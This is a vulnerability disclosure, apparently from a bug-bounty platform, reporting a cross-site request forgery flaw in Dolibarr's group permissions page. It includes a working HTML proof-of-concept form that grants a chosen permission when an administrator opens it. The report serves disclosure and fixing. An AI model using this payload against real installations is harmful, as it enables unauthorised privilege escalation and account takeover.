Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 18th 2021

✍️ Description

Attacker can add or delete any permission for any user with CSRF vulnerability when the Admin or SuperAdmin or an authorized user click on PoC.html file, it is enough to attacker know the permission id on server that start from 1.

There is no CSRF token in this situation and the CSRF attack easily can performed

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.75.10/user/group/perms.php">
      <input type="hidden" name="id" value="5" />
      <input type="hidden" name="action" value="addrights" />
      <input type="hidden" name="entity" value="1" />
      <input type="hidden" name="rights" value="71" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of perform account take over because if attacker is a very low level user then attacker can get very high privileges and then it could modify other users and members and ...

Occurrences

mailing-send.php L2

We have contacted a member of the dolibarr team and are waiting to hear back 2 years ago

Laurent Destailleur validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

to join this conversation

We have contacted a member of the dolibarr team and are waiting to hear back 2 years ago

Laurent Destailleur validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

to join this conversation